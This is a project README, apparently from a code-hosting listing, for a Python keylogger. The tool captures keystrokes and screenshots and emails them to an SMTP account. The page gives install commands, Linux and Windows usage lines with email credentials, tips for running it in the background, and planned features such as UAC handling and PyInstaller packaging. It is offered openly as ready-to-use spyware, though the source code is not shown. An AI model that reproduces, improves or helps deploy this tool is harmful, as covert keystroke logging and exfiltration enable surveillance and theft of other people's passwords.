Simple Keylogger with smtp to send emails on your account using python works on linux and Windows

TrueBinary TrueBinary Last update: Aug 24, 2022

icon

SimpleKeylogger

this is a simple keylogger written in Python using thepyxhook module which is an implementatation of pyhookmoduleand the keylogger send to your email everything thatkeylogger got

What i will Need to you this Script ?

do you gonna need pyxhood and python-xlibthe last one rest is pyscreenshot

How i install this libs ?

sample just copy and past in your terminal

pip install pyscreenshot pyxhook && sudo apt install python-xlib

How i use it on Linux ?

python keylogger.py --email "[email protected]" --password "example1234"

How i use it on Windows?

./keylogger.exe -e "[email protected]" -p "example1234" --local C:/anyware/Desktop/logs.txt

How to let the program running on background ?

this is a simple just run the program with & or on the end

Syntax

 --password is your password of your email   --email is logic your email to send the logs    --local is the local where the program gonna save the logs and did will use to send the logs to your email --time is the time the Screenshots is will be sended to your email

Meta

@Mrtrue - [email protected]distributed under license GNU GENERAL PUBLIC LICENSE version 3 by Free Software Foundation, Inc. Read the original GPL v3.

Feature

  • take screenshot of window
  • Windows Version
  • Add UAC on Windows Version
  • Arguments and make a binare of the program
  • Make the program run in the background
  • Add the Pyinstaller

Contributing

  1. Fork it (https://github.com/TrueBinaru/SimpleKeyLogger/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request

How to use look at this tutorial

Tutorial

Subscribe to our newsletter